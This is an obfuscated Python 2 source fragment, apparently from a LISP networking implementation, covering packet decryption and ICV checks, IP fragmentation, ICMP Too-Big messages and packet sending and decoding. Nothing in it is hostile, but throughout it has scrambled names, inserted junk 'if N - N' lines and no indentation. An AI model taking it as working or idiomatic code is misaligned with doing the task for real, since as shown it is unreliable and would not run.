if 61 - 61: I1Ii111 * I1ii11iIi11i % I1IiiI % OoO0O00 % I11i + I11i
if 6 - 6: Oo0Ooo
def decrypt ( self , packet , header_length , key , addr_str ) :
if 73 - 73: I1Ii111 * I1ii11iIi11i + o0oOOo0O0Ooo - Oo0Ooo . I11i
if 93 - 93: i11iIiiIii
if 80 - 80: i1IIi . I1IiiI - oO0o + OOooOOo + iII111i % oO0o
if 13 - 13: II111iiii / OoOoOO00 / OoOoOO00 + ooOoO0o
if 49 - 49: O0 / II111iiii * I1IiiI - OoooooooOO . II111iiii % IiII
if 13 - 13: oO0o . iIii1I11I1II1 . OOooOOo . IiII
if ( key . do_poly ) :
OOOo0 , o0Oooo0o0oO0 = struct . unpack ( "QQ" , packet [ - 16 : : ] )
oo0oo00O0O = byte_swap_64 ( OOOo0 ) << 64
oo0oo00O0O |= byte_swap_64 ( o0Oooo0o0oO0 )
oo0oo00O0O = lisp_hex_string ( oo0oo00O0O ) . zfill ( 32 )
packet = packet [ 0 : - 16 ]
O0oo0000o = 4
iIiiI1I = bold ( "poly" , False )
else :
OOOo0 , o0Oooo0o0oO0 , IIIiIiiI1i = struct . unpack ( "QQI" , packet [ - 20 : : ] )
oo0oo00O0O = byte_swap_64 ( OOOo0 ) << 96
oo0oo00O0O |= byte_swap_64 ( o0Oooo0o0oO0 ) << 32
oo0oo00O0O |= socket . htonl ( IIIiIiiI1i )
oo0oo00O0O = lisp_hex_string ( oo0oo00O0O ) . zfill ( 40 )
packet = packet [ 0 : - 20 ]
O0oo0000o = 8
iIiiI1I = bold ( "sha" , False )
if 65 - 65: I1IiiI . I1IiiI % OOooOOo + ooOoO0o + OoooooooOO - i11iIiiIii
iI1 = self . lisp_header . encode ( )
if 94 - 94: oO0o . o0oOOo0O0Ooo % o0oOOo0O0Ooo % I1IiiI - iII111i / i11iIiiIii
if 73 - 73: O0 * I1Ii111 . i1IIi
if 51 - 51: OoO0O00 - iII111i % O0 - OoOoOO00
if 53 - 53: iII111i / i1IIi / i1IIi
if ( key . cipher_suite == LISP_CS_25519_CHACHA ) :
o0oo00O = 8
iI1oOoo = bold ( "chacha" , False )
elif ( key . cipher_suite == LISP_CS_25519_GCM ) :
o0oo00O = 12
iI1oOoo = bold ( "aes-gcm" , False )
else :
o0oo00O = 16
iI1oOoo = bold ( "aes-cbc" , False )
if 36 - 36: OOooOOo * OoO0O00 - I1ii11iIi11i + iII111i
iiI1iiIiiiI1I = packet [ 0 : o0oo00O ]
if 13 - 13: OoO0O00 % iIii1I11I1II1 - II111iiii / I1IiiI
if 9 - 9: I1ii11iIi11i * Ii1I - IiII
if 88 - 88: iIii1I11I1II1
if 27 - 27: I11i * i11iIiiIii . OOooOOo + ooOoO0o
I1III1i11II1i = key . do_icv ( iI1 + packet , iiI1iiIiiiI1I )
if 74 - 74: OoO0O00 + iII111i + II111iiii
i111 = "0x{}...{}" . format ( oo0oo00O0O [ 0 : O0oo0000o ] , oo0oo00O0O [ - O0oo0000o : : ] )
IIIIIII1i = "0x{}...{}" . format ( I1III1i11II1i [ 0 : O0oo0000o ] , I1III1i11II1i [ - O0oo0000o : : ] )
if 30 - 30: IiII - iII111i - OoO0O00
if ( I1III1i11II1i != oo0oo00O0O ) :
self . packet_error = "ICV-error"
ii11 = iI1oOoo + "/" + iIiiI1I
oOOooooO = bold ( "ICV failed ({})" . format ( ii11 ) , False )
iIiiII = "packet-ICV {} != computed-ICV {}" . format ( i111 , IIIIIII1i )
dprint ( ( "{} from RLOC {}, receive-port: {}, key-id: {}, " + "packet dropped, {}" ) . format ( oOOooooO , red ( addr_str , False ) ,
# I1Ii111 / Ii1I * OOooOOo * i1IIi . Ii1I * i11iIiiIii
self . udp_sport , key . key_id , iIiiII ) )
dprint ( "{}" . format ( key . print_keys ( ) ) )
if 91 - 91: Ii1I - iII111i . i1IIi . I1ii11iIi11i * o0oOOo0O0Ooo % iII111i
if 30 - 30: I11i
if 85 - 85: II111iiii + ooOoO0o * I11i
if 12 - 12: Ii1I . I1IiiI % o0oOOo0O0Ooo
if 28 - 28: Ii1I - I1IiiI % OoO0O00 * I1Ii111
if 80 - 80: OOooOOo * IiII
lisp_retry_decap_keys ( addr_str , iI1 + packet , iiI1iiIiiiI1I , oo0oo00O0O )
return ( [ None , False ] )
if 4 - 4: iIii1I11I1II1 . I1Ii111 + II111iiii % OoooooooOO
if 82 - 82: OoooooooOO / ooOoO0o * I11i * O0 . I1ii11iIi11i
if 21 - 21: II111iiii + Oo0Ooo
if 59 - 59: OOooOOo + I1IiiI / II111iiii / OoOoOO00
if 80 - 80: OoOoOO00 + iIii1I11I1II1 . IiII
packet = packet [ o0oo00O : : ]
if 76 - 76: I1IiiI * OOooOOo
if 12 - 12: iIii1I11I1II1 / I11i % Ii1I
if 49 - 49: OoO0O00 + II111iiii / IiII - O0 % Ii1I
if 27 - 27: OoO0O00 + Oo0Ooo
i1 = lisp_get_timestamp ( )
if ( key . cipher_suite == LISP_CS_25519_CHACHA ) :
oO0oOOooO0 = chacha . ChaCha ( key . encrypt_key , iiI1iiIiiiI1I ) . decrypt
elif ( key . cipher_suite == LISP_CS_25519_GCM ) :
oOoOOoo = binascii . unhexlify ( key . encrypt_key )
try :
oO0oOOooO0 = AES . new ( oOoOOoo , AES . MODE_GCM , iiI1iiIiiiI1I ) . decrypt
except :
self . packet_error = "no-decrypt-key"
lprint ( "You need AES-GCM, do a 'pip install pycryptodome'" )
return ( [ None , False ] )
if 62 - 62: i11iIiiIii - I11i
else :
if ( ( len ( packet ) % 16 ) != 0 ) :
dprint ( "Ciphertext not multiple of 16 bytes, packet dropped" )
return ( [ None , False ] )
if 81 - 81: I11i
oOoOOoo = binascii . unhexlify ( key . encrypt_key )
oO0oOOooO0 = AES . new ( oOoOOoo , AES . MODE_CBC , iiI1iiIiiiI1I ) . decrypt
if 92 - 92: OOooOOo - Oo0Ooo - OoooooooOO / IiII - i1IIi
if 81 - 81: i1IIi / I1Ii111 % i11iIiiIii . iIii1I11I1II1 * OoOoOO00 + OoooooooOO
iiii1Ii1iii = oO0oOOooO0 ( packet )
i1 = int ( str ( time . time ( ) - i1 ) . split ( "." ) [ 1 ] [ 0 : 6 ] )
if 73 - 73: i11iIiiIii + oO0o % I11i . OoooooooOO % oO0o
if 32 - 32: i11iIiiIii - II111iiii
if 21 - 21: OoOoOO00 - II111iiii
if 10 - 10: OoOoOO00 - o0oOOo0O0Ooo * i11iIiiIii / Oo0Ooo + o0oOOo0O0Ooo + iIii1I11I1II1
Iii11I111Ii11 = bold ( "Decrypt" , False )
addr_str = "RLOC: " + red ( addr_str , False )
o00O0o00oo = "poly" if key . do_poly else "sha256"
o00O0o00oo = bold ( o00O0o00oo , False )
iIiiII = "ICV({}): {}" . format ( o00O0o00oo , i111 )
dprint ( "{} for key-id: {}, {}, {} (good), {}-time: {} usec" . format ( Iii11I111Ii11 , key . key_id , addr_str , iIiiII , iI1oOoo , i1 ) )
if 23 - 23: i1IIi + I1ii11iIi11i + I1IiiI - ooOoO0o % OoooooooOO . IiII
if 49 - 49: oO0o . OoOoOO00
if 73 - 73: Ii1I / I1IiiI / OoooooooOO + I1IiiI
if 57 - 57: OOooOOo . Ii1I % o0oOOo0O0Ooo
if 32 - 32: I11i / IiII - O0 * iIii1I11I1II1
if 70 - 70: OoooooooOO % OoooooooOO % OoO0O00
if 98 - 98: OoO0O00
self . packet = self . packet [ 0 : header_length ]
return ( [ iiii1Ii1iii , True ] )
if 18 - 18: I11i + Oo0Ooo - OoO0O00 / I1Ii111 / OOooOOo
if 53 - 53: OOooOOo + o0oOOo0O0Ooo . oO0o / I11i
def fragment_outer ( self , outer_hdr , inner_packet ) :
o0000oO = 1000
if 83 - 83: OoO0O00
if 16 - 16: ooOoO0o
if 32 - 32: o0oOOo0O0Ooo % I1IiiI
if 7 - 7: Oo0Ooo . i1IIi - oO0o
if 93 - 93: IiII % I1ii11iIi11i
IiIIii = [ ]
OoO00oo00 = 0
IiiI1iii1iIiiI = len ( inner_packet )
while ( OoO00oo00 < IiiI1iii1iIiiI ) :
ii11I = inner_packet [ OoO00oo00 : : ]
if ( len ( ii11I ) > o0000oO ) : ii11I = ii11I [ 0 : o0000oO ]
IiIIii . append ( ii11I )
OoO00oo00 += len ( ii11I )
if 74 - 74: iIii1I11I1II1 / Ii1I
if 59 - 59: Ii1I / II111iiii - IiII % OoOoOO00 % OoooooooOO
if 79 - 79: iII111i . OoooooooOO . I1IiiI * O0 * OoO0O00 - OOooOOo
if 33 - 33: I1ii11iIi11i . Oo0Ooo + I1IiiI + o0oOOo0O0Ooo
if 54 - 54: ooOoO0o * iII111i * iII111i % OoOoOO00 - OOooOOo % I1ii11iIi11i
if 44 - 44: Oo0Ooo . OOooOOo + I11i
I1Ii1iIIiiiIi = [ ]
OoO00oo00 = 0
for ii11I in IiIIii :
if 93 - 93: II111iiii . i11iIiiIii + II111iiii % oO0o
if 98 - 98: I1Ii111 * oO0o * OoOoOO00 + Ii1I * iII111i
if 4 - 4: IiII
if 16 - 16: iIii1I11I1II1 * iII111i + oO0o . O0 . o0oOOo0O0Ooo
oo00o00O0 = OoO00oo00 if ( ii11I == IiIIii [ - 1 ] ) else 0x2000 + OoO00oo00
oo00o00O0 = socket . htons ( oo00o00O0 )
outer_hdr = outer_hdr [ 0 : 6 ] + struct . pack ( "H" , oo00o00O0 ) + outer_hdr [ 8 : : ]
if 52 - 52: iII111i + O0 % o0oOOo0O0Ooo % O0 % II111iiii + OoooooooOO
if 51 - 51: iII111i % i11iIiiIii
if 28 - 28: I1ii11iIi11i + I1ii11iIi11i % OoOoOO00
if 12 - 12: I11i
I11iIi1i1I1i1 = socket . htons ( len ( ii11I ) + 20 )
outer_hdr = outer_hdr [ 0 : 2 ] + struct . pack ( "H" , I11iIi1i1I1i1 ) + outer_hdr [ 4 : : ]
outer_hdr = lisp_ip_checksum ( outer_hdr )
I1Ii1iIIiiiIi . append ( outer_hdr + ii11I )
OoO00oo00 += len ( ii11I ) / 8
if 14 - 14: I11i
return ( I1Ii1iIIiiiIi )
if 18 - 18: I1IiiI
if 23 - 23: OoooooooOO * II111iiii
def send_icmp_too_big ( self , inner_packet ) :
global lisp_last_icmp_too_big_sent
global lisp_icmp_raw_socket
if 70 - 70: I1ii11iIi11i + I1IiiI
oO000o0Oo00 = time . time ( ) - lisp_last_icmp_too_big_sent
if ( oO000o0Oo00 < LISP_ICMP_TOO_BIG_RATE_LIMIT ) :
lprint ( "Rate limit sending ICMP Too-Big to {}" . format ( self . inner_source . print_address_no_iid ( ) ) )
if 65 - 65: iII111i - iII111i . Oo0Ooo
return ( False )
if 54 - 54: I1IiiI % iII111i
if 80 - 80: o0oOOo0O0Ooo % iII111i
if 80 - 80: Ii1I
if 26 - 26: iIii1I11I1II1 . OoooooooOO - iIii1I11I1II1
if 59 - 59: I1ii11iIi11i + I11i . oO0o
if 87 - 87: OoO0O00
if 34 - 34: I1Ii111 . OoOoOO00 / i11iIiiIii / iII111i
if 46 - 46: Oo0Ooo + II111iiii * I1IiiI + OOooOOo
if 31 - 31: Ii1I * o0oOOo0O0Ooo * Ii1I + OoO0O00 * o0oOOo0O0Ooo . I1Ii111
if 89 - 89: OoooooooOO * Ii1I * I1IiiI . ooOoO0o * Ii1I / iII111i
if 46 - 46: i11iIiiIii
if 15 - 15: O0 / i1IIi / i1IIi . iII111i % OoOoOO00 + I1IiiI
if 48 - 48: I1Ii111 % iII111i % Ii1I % iIii1I11I1II1 . Ii1I
if 14 - 14: iII111i * OoO0O00 % O0 + I11i + I1ii11iIi11i
if 23 - 23: Oo0Ooo % iII111i + Ii1I - I1Ii111
ooOO = socket . htons ( 1400 )
O00ooooo00 = struct . pack ( "BBHHH" , 3 , 4 , 0 , 0 , ooOO )
O00ooooo00 += inner_packet [ 0 : 20 + 8 ]
O00ooooo00 = lisp_icmp_checksum ( O00ooooo00 )
if 66 - 66: Oo0Ooo / i11iIiiIii % ooOoO0o
if 43 - 43: OOooOOo
if 84 - 84: OOooOOo . IiII . iII111i
if 2 - 2: Oo0Ooo - OoOoOO00
if 49 - 49: Ii1I + II111iiii / oO0o - OoOoOO00 % OoOoOO00 + I1IiiI
if 54 - 54: ooOoO0o % Oo0Ooo - OOooOOo
if 16 - 16: I1ii11iIi11i * iII111i / I11i
iiII1 = inner_packet [ 12 : 16 ]
oo0OoO = self . inner_source . print_address_no_iid ( )
iIIi1iii1 = self . outer_source . pack_address ( )
if 64 - 64: ooOoO0o / i1IIi % iII111i
if 84 - 84: OoOoOO00 - Oo0Ooo . ooOoO0o . IiII - Oo0Ooo
if 99 - 99: I1Ii111
if 75 - 75: ooOoO0o . OOooOOo / IiII
if 84 - 84: OoooooooOO . I1IiiI / o0oOOo0O0Ooo
if 86 - 86: Oo0Ooo % OoOoOO00
if 77 - 77: Ii1I % OOooOOo / oO0o
if 91 - 91: OoO0O00 / OoO0O00 . II111iiii . ooOoO0o - I1IiiI
IiI = socket . htons ( 20 + 36 )
Ooo0oO = struct . pack ( "BBHHHBBH" , 0x45 , 0 , IiI , 0 , 0 , 32 , 1 , 0 ) + iIIi1iii1 + iiII1
Ooo0oO = lisp_ip_checksum ( Ooo0oO )
Ooo0oO = self . fix_outer_header ( Ooo0oO )
Ooo0oO += O00ooooo00
iii11 = bold ( "Too-Big" , False )
lprint ( "Send ICMP {} to {}, mtu 1400: {}" . format ( iii11 , oo0OoO ,
lisp_format_packet ( Ooo0oO ) ) )
if 59 - 59: Oo0Ooo / i11iIiiIii * I1IiiI + OoO0O00
try :
lisp_icmp_raw_socket . sendto ( Ooo0oO , ( oo0OoO , 0 ) )
except socket . error , oOo :
lprint ( "lisp_icmp_raw_socket.sendto() failed: {}" . format ( oOo ) )
return ( False )
if 47 - 47: OOooOOo / II111iiii % IiII . oO0o * I1ii11iIi11i
if 35 - 35: Oo0Ooo * II111iiii
if 32 - 32: oO0o . Oo0Ooo / ooOoO0o + ooOoO0o . I1ii11iIi11i
if 50 - 50: iIii1I11I1II1 * oO0o
if 85 - 85: i1IIi
if 100 - 100: OoooooooOO / I11i % OoO0O00 + Ii1I
lisp_last_icmp_too_big_sent = lisp_get_timestamp ( )
return ( True )
if 42 - 42: Oo0Ooo / IiII . Ii1I * I1IiiI
def fragment ( self ) :
global lisp_icmp_raw_socket
global lisp_ignore_df_bit
if 54 - 54: OoOoOO00 * iII111i + OoO0O00
IiiiIi1iiii11 = self . fix_outer_header ( self . packet )
if 93 - 93: o0oOOo0O0Ooo / I1IiiI
if 47 - 47: Oo0Ooo * OOooOOo
if 98 - 98: oO0o - oO0o . ooOoO0o
if 60 - 60: I1IiiI * I1ii11iIi11i / O0 + I11i + IiII
if 66 - 66: IiII * Oo0Ooo . OoooooooOO * I1Ii111
if 93 - 93: IiII / i1IIi
IiiI1iii1iIiiI = len ( IiiiIi1iiii11 )
if ( IiiI1iii1iIiiI <= 1500 ) : return ( [ IiiiIi1iiii11 ] , "Fragment-None" )
if 47 - 47: ooOoO0o - Ii1I
IiiiIi1iiii11 = self . packet
if 98 - 98: oO0o . I1Ii111 / OoOoOO00 . ooOoO0o
if 1 - 1: OOooOOo
if 87 - 87: O0 * II111iiii + iIii1I11I1II1 % oO0o % i11iIiiIii - OoOoOO00
if 73 - 73: iII111i + Ii1I
if 37 - 37: oO0o - iIii1I11I1II1 + II111iiii . Ii1I % iIii1I11I1II1
if ( self . inner_version != 4 ) :
i11iiI = random . randint ( 0 , 0xffff )
IiiiI11 = IiiiIi1iiii11 [ 0 : 4 ] + struct . pack ( "H" , i11iiI ) + IiiiIi1iiii11 [ 6 : 20 ]
OoooOOo0oOO = IiiiIi1iiii11 [ 20 : : ]
I1Ii1iIIiiiIi = self . fragment_outer ( IiiiI11 , OoooOOo0oOO )
return ( I1Ii1iIIiiiIi , "Fragment-Outer" )
if 44 - 44: OOooOOo % iIii1I11I1II1
if 30 - 30: i11iIiiIii - I1IiiI / I1ii11iIi11i
if 26 - 26: ooOoO0o % oO0o + I1IiiI / IiII . I1IiiI
if 38 - 38: OoooooooOO + OoooooooOO - i11iIiiIii * I1IiiI * i1IIi / II111iiii
if 78 - 78: Oo0Ooo - I1Ii111 + iII111i * Ii1I * o0oOOo0O0Ooo
iIiiiII11 = 56 if ( self . outer_version == 6 ) else 36
IiiiI11 = IiiiIi1iiii11 [ 0 : iIiiiII11 ]
ooo00Oo0 = IiiiIi1iiii11 [ iIiiiII11 : iIiiiII11 + 20 ]
OoooOOo0oOO = IiiiIi1iiii11 [ iIiiiII11 + 20 : : ]
if 46 - 46: oO0o
if 56 - 56: OoooooooOO
if 84 - 84: I1Ii111
if 53 - 53: i1IIi
if 59 - 59: o0oOOo0O0Ooo + I1IiiI % OoooooooOO - iIii1I11I1II1
iiIII1i1 = struct . unpack ( "H" , ooo00Oo0 [ 6 : 8 ] ) [ 0 ]
iiIII1i1 = socket . ntohs ( iiIII1i1 )
if ( iiIII1i1 & 0x4000 ) :
if ( lisp_icmp_raw_socket != None ) :
oOOo0OOoOO0 = IiiiIi1iiii11 [ iIiiiII11 : : ]
if ( self . send_icmp_too_big ( oOOo0OOoOO0 ) ) : return ( [ ] , None )
if 30 - 30: II111iiii / I1IiiI - ooOoO0o + OoOoOO00 * ooOoO0o / OoOoOO00
if ( lisp_ignore_df_bit ) :
iiIII1i1 &= ~ 0x4000
else :
ii1IIIi = bold ( "DF-bit set" , False )
dprint ( "{} in inner header, packet discarded" . format ( ii1IIIi ) )
return ( [ ] , "Fragment-None-DF-bit" )
if 78 - 78: o0oOOo0O0Ooo / o0oOOo0O0Ooo / I1IiiI . I1ii11iIi11i - OoooooooOO
if 16 - 16: IiII % OoooooooOO - ooOoO0o * Ii1I - Ii1I
if 27 - 27: IiII + iIii1I11I1II1 / Oo0Ooo + OoO0O00 % Oo0Ooo + OoO0O00
OoO00oo00 = 0
IiiI1iii1iIiiI = len ( OoooOOo0oOO )
I1Ii1iIIiiiIi = [ ]
while ( OoO00oo00 < IiiI1iii1iIiiI ) :
I1Ii1iIIiiiIi . append ( OoooOOo0oOO [ OoO00oo00 : OoO00oo00 + 1400 ] )
OoO00oo00 += 1400
if 77 - 77: Oo0Ooo * ooOoO0o % Ii1I
if 2 - 2: I11i / Oo0Ooo / Ii1I / I1ii11iIi11i / OoooooooOO
if 22 - 22: iIii1I11I1II1 * I1IiiI / I11i + OoOoOO00
if 98 - 98: OOooOOo
if 69 - 69: II111iiii + Oo0Ooo - oO0o . Oo0Ooo / iIii1I11I1II1 * iIii1I11I1II1
IiIIii = I1Ii1iIIiiiIi
I1Ii1iIIiiiIi = [ ]
oOooooooO0o = True if iiIII1i1 & 0x2000 else False
iiIII1i1 = ( iiIII1i1 & 0x1fff ) * 8
for ii11I in IiIIii :
if 54 - 54: Ii1I . O0
if 79 - 79: IiII / OoO0O00 * OoooooooOO * OoOoOO00 + I1IiiI
if 68 - 68: I11i / iIii1I11I1II1 . Oo0Ooo + i11iIiiIii + o0oOOo0O0Ooo
if 92 - 92: OoO0O00 . o0oOOo0O0Ooo . Ii1I % OoOoOO00
OO00O00o0O = iiIII1i1 / 8
if ( oOooooooO0o ) :
OO00O00o0O |= 0x2000
elif ( ii11I != IiIIii [ - 1 ] ) :
OO00O00o0O |= 0x2000
if 100 - 100: OoO0O00 % OoOoOO00 / I11i * O0 - oO0o
OO00O00o0O = socket . htons ( OO00O00o0O )
ooo00Oo0 = ooo00Oo0 [ 0 : 6 ] + struct . pack ( "H" , OO00O00o0O ) + ooo00Oo0 [ 8 : : ]
if 34 - 34: iII111i % i11iIiiIii + i11iIiiIii - iII111i
if 2 - 2: II111iiii + i1IIi
if 68 - 68: OOooOOo + Ii1I
if 58 - 58: IiII * Ii1I . i1IIi
if 19 - 19: oO0o
if 85 - 85: ooOoO0o - I1IiiI / i1IIi / OoO0O00 / II111iiii
IiiI1iii1iIiiI = len ( ii11I )
iiIII1i1 += IiiI1iii1iIiiI
I11iIi1i1I1i1 = socket . htons ( IiiI1iii1iIiiI + 20 )
ooo00Oo0 = ooo00Oo0 [ 0 : 2 ] + struct . pack ( "H" , I11iIi1i1I1i1 ) + ooo00Oo0 [ 4 : 10 ] + struct . pack ( "H" , 0 ) + ooo00Oo0 [ 12 : : ]
if 94 - 94: iIii1I11I1II1 + IiII
ooo00Oo0 = lisp_ip_checksum ( ooo00Oo0 )
II11II = ooo00Oo0 + ii11I
if 40 - 40: iII111i + O0
if 18 - 18: iIii1I11I1II1 % iIii1I11I1II1 % oO0o + I1IiiI % ooOoO0o / Ii1I
if 36 - 36: OoOoOO00 . i11iIiiIii
if 81 - 81: Oo0Ooo * iII111i * OoO0O00
if 85 - 85: O0 * oO0o
IiiI1iii1iIiiI = len ( II11II )
if ( self . outer_version == 4 ) :
I11iIi1i1I1i1 = IiiI1iii1iIiiI + iIiiiII11
IiiI1iii1iIiiI += 16
IiiiI11 = IiiiI11 [ 0 : 2 ] + struct . pack ( "H" , I11iIi1i1I1i1 ) + IiiiI11 [ 4 : : ]
if 39 - 39: II111iiii * I1IiiI - iIii1I11I1II1
IiiiI11 = lisp_ip_checksum ( IiiiI11 )
II11II = IiiiI11 + II11II
II11II = self . fix_outer_header ( II11II )
if 25 - 25: OoooooooOO . Ii1I % iII111i . IiII
if 67 - 67: OoooooooOO + I1Ii111 / ooOoO0o
if 75 - 75: IiII / OoooooooOO . I1IiiI + I1Ii111 - II111iiii
if 33 - 33: IiII / IiII . i11iIiiIii * I1ii11iIi11i + o0oOOo0O0Ooo
if 16 - 16: IiII
II1 = iIiiiII11 - 12
I11iIi1i1I1i1 = socket . htons ( IiiI1iii1iIiiI )
II11II = II11II [ 0 : II1 ] + struct . pack ( "H" , I11iIi1i1I1i1 ) + II11II [ II1 + 2 : : ]
if 86 - 86: oO0o . I1IiiI - I1Ii111 + iIii1I11I1II1
I1Ii1iIIiiiIi . append ( II11II )
if 66 - 66: I11i - I11i + IiII
return ( I1Ii1iIIiiiIi , "Fragment-Inner" )
if 20 - 20: I1Ii111 . i1IIi
if 9 - 9: OoO0O00
def fix_outer_header ( self , packet ) :
if 89 - 89: i1IIi
if 19 - 19: ooOoO0o / o0oOOo0O0Ooo % IiII - Ii1I
if 14 - 14: I1ii11iIi11i - i11iIiiIii * I1Ii111
if 39 - 39: OoooooooOO
if 19 - 19: i11iIiiIii
if 80 - 80: I1IiiI
if 58 - 58: oO0o + I1ii11iIi11i % OoOoOO00
if 22 - 22: iIii1I11I1II1 - Ii1I / I1IiiI * IiII
if ( self . outer_version == 4 or self . inner_version == 4 ) :
if ( lisp_is_macos ( ) ) :
packet = packet [ 0 : 2 ] + packet [ 3 ] + packet [ 2 ] + packet [ 4 : 6 ] + packet [ 7 ] + packet [ 6 ] + packet [ 8 : : ]
if 26 - 26: o0oOOo0O0Ooo + OOooOOo - o0oOOo0O0Ooo + Oo0Ooo . oO0o
else :
packet = packet [ 0 : 2 ] + packet [ 3 ] + packet [ 2 ] + packet [ 4 : : ]
if 97 - 97: i1IIi
if 46 - 46: I1ii11iIi11i
return ( packet )
if 30 - 30: OoO0O00 / O0 * o0oOOo0O0Ooo * I1Ii111 + OoooooooOO * iII111i
if 23 - 23: I11i
def send_packet ( self , lisp_raw_socket , dest ) :
if ( lisp_flow_logging and dest != self . inner_dest ) : self . log_flow ( True )
if 36 - 36: IiII . iII111i - i1IIi + I1Ii111
dest = dest . print_address_no_iid ( )
I1Ii1iIIiiiIi , ooO = self . fragment ( )
if 62 - 62: OoooooooOO % oO0o * II111iiii * I1Ii111 * I1Ii111 / ooOoO0o
for II11II in I1Ii1iIIiiiIi :
if ( len ( I1Ii1iIIiiiIi ) != 1 ) :
self . packet = II11II
self . print_packet ( ooO , True )
if 90 - 90: I1Ii111 . II111iiii . I1ii11iIi11i
if 32 - 32: ooOoO0o - OoO0O00 . iII111i . iII111i % i1IIi * Ii1I
try : lisp_raw_socket . sendto ( II11II , ( dest , 0 ) )
except socket . error , oOo :
lprint ( "socket.sendto() failed: {}" . format ( oOo ) )
if 65 - 65: iII111i / ooOoO0o . II111iiii
if 90 - 90: I11i
if 95 - 95: OoO0O00
if 68 - 68: iIii1I11I1II1 . iIii1I11I1II1 / OoOoOO00 - II111iiii - iIii1I11I1II1
def send_l2_packet ( self , l2_socket , mac_header ) :
if ( l2_socket == None ) :
lprint ( "No layer-2 socket, drop IPv6 packet" )
return
if 75 - 75: ooOoO0o . I1IiiI * II111iiii
if ( mac_header == None ) :
lprint ( "Could not build MAC header, drop IPv6 packet" )
return
if 99 - 99: iIii1I11I1II1 * I1ii11iIi11i + IiII
if 70 - 70: i1IIi % ooOoO0o . I1ii11iIi11i - IiII + OOooOOo
IiiiIi1iiii11 = mac_header + self . packet
if 84 - 84: oO0o + II111iiii * II111iiii % o0oOOo0O0Ooo / iII111i + ooOoO0o
if 9 - 9: iII111i
if 25 - 25: OOooOOo - Ii1I . I11i
if 57 - 57: o0oOOo0O0Ooo + Oo0Ooo * I1ii11iIi11i - ooOoO0o % iIii1I11I1II1 - Ii1I
if 37 - 37: OoO0O00 * I11i + Ii1I + I1ii11iIi11i * o0oOOo0O0Ooo
if 95 - 95: Ii1I - i11iIiiIii % i11iIiiIii - O0 * I1Ii111
if 81 - 81: II111iiii * I1IiiI % i1IIi * i11iIiiIii + OoOoOO00
if 100 - 100: i1IIi % Ii1I
if 55 - 55: I1IiiI + iII111i
if 85 - 85: oO0o + iII111i % iII111i / I11i . I1IiiI - OoOoOO00
if 19 - 19: I11i / iII111i + IiII
l2_socket . write ( IiiiIi1iiii11 )
return
if 76 - 76: iIii1I11I1II1 / I1Ii111 - I1ii11iIi11i % o0oOOo0O0Ooo % OOooOOo + OoooooooOO
if 10 - 10: OoO0O00 * I11i / Oo0Ooo - I1Ii111
def bridge_l2_packet ( self , eid , db ) :
try : I1iIi1IiI1i = db . dynamic_eids [ eid . print_address_no_iid ( ) ]
except : return
try : II1i = lisp_myinterfaces [ I1iIi1IiI1i . interface ]
except : return
try :
socket = II1i . get_bridge_socket ( )
if ( socket == None ) : return
except : return
if 50 - 50: i1IIi * oO0o / i11iIiiIii / i11iIiiIii / oO0o
try : socket . send ( self . packet )
except socket . error , oOo :
lprint ( "bridge_l2_packet(): socket.send() failed: {}" . format ( oOo ) )
if 84 - 84: I1ii11iIi11i - iII111i + I1ii11iIi11i
if 63 - 63: I11i * ooOoO0o % II111iiii % I1Ii111 + I1IiiI * Oo0Ooo
if 96 - 96: IiII
def is_lisp_packet ( self , packet ) :
o0oOo00 = ( struct . unpack ( "B" , packet [ 9 ] ) [ 0 ] == LISP_UDP_PROTOCOL )
if ( o0oOo00 == False ) : return ( False )
if 99 - 99: iIii1I11I1II1 - ooOoO0o
Oo0O00O = struct . unpack ( "H" , packet [ 22 : 24 ] ) [ 0 ]
if ( socket . ntohs ( Oo0O00O ) == LISP_DATA_PORT ) : return ( True )
Oo0O00O = struct . unpack ( "H" , packet [ 20 : 22 ] ) [ 0 ]
if ( socket . ntohs ( Oo0O00O ) == LISP_DATA_PORT ) : return ( True )
return ( False )
if 56 - 56: I1ii11iIi11i + oO0o . OoO0O00 + OoooooooOO * I1ii11iIi11i - O0
if 35 - 35: OOooOOo . I11i . I1Ii111 - I11i % I11i + I1Ii111
def decode ( self , is_lisp_packet , lisp_ipc_socket , stats ) :
self . packet_error = ""
IiiiIi1iiii11 = self . packet
oO0oO00 = len ( IiiiIi1iiii11 )
IiiI1Ii1II = OO0oIii1I1I = True
if 41 - 41: I1IiiI . Oo0Ooo . IiII % OoooooooOO + OoO0O00
if 23 - 23: I1IiiI - o0oOOo0O0Ooo % oO0o . O0 * OoooooooOO + ooOoO0o
if 53 - 53: Oo0Ooo
if 3 - 3: IiII - OoooooooOO * OoooooooOO - I1IiiI / I1Ii111 * I1ii11iIi11i
O0oo0ooO00 = 0
o0OoO0000o = 0
if ( is_lisp_packet ) :
o0OoO0000o = self . lisp_header . get_instance_id ( )
oOoO0 = struct . unpack ( "B" , IiiiIi1iiii11 [ 0 : 1 ] ) [ 0 ]
self . outer_version = oOoO0 >> 4
if ( self . outer_version == 4 ) :
if 50 - 50: I1Ii111 * I1Ii111 * Oo0Ooo - OoO0O00
if 12 - 12: Oo0Ooo + iII111i / OoO0O00 / Oo0Ooo
if 92 - 92: I1Ii111 % iII111i % o0oOOo0O0Ooo . I1IiiI - I1ii11iIi11i - o0oOOo0O0Ooo
if 40 - 40: I1IiiI / OoooooooOO + OoO0O00 * OoO0O00
if 9 - 9: iIii1I11I1II1
O0000 = struct . unpack ( "H" , IiiiIi1iiii11 [ 10 : 12 ] ) [ 0 ]
IiiiIi1iiii11 = lisp_ip_checksum ( IiiiIi1iiii11 )
Oo0 = struct . unpack ( "H" , IiiiIi1iiii11 [ 10 : 12 ] ) [ 0 ]
if ( Oo0 != 0 ) :
if ( O0000 != 0 or lisp_is_macos ( ) == False ) :
self . packet_error = "checksum-error"
if ( stats ) :
stats [ self . packet_error ] . increment ( oO0oO00 )
if 53 - 53: I1Ii111
if 31 - 31: o0oOOo0O0Ooo * I11i - i11iIiiIii - I1IiiI
lprint ( "IPv4 header checksum failed for outer header" )
if ( lisp_flow_logging ) : self . log_flow ( False )
return ( None )
if 19 - 19: iII111i . I11i * OoooooooOO - OOooOOo + O0 * I1Ii111
if 90 - 90: i1IIi . oO0o / I1Ii111 . OOooOOo / I1Ii111
if 1 - 1: iII111i % ooOoO0o
O0ooo0 = LISP_AFI_IPV4
OoO00oo00 = 12
self . outer_tos = struct . unpack ( "B" , IiiiIi1iiii11 [ 1 : 2 ] ) [ 0 ]
self . outer_ttl = struct . unpack ( "B" , IiiiIi1iiii11 [ 8 : 9 ] ) [ 0 ]
O0oo0ooO00 = 20
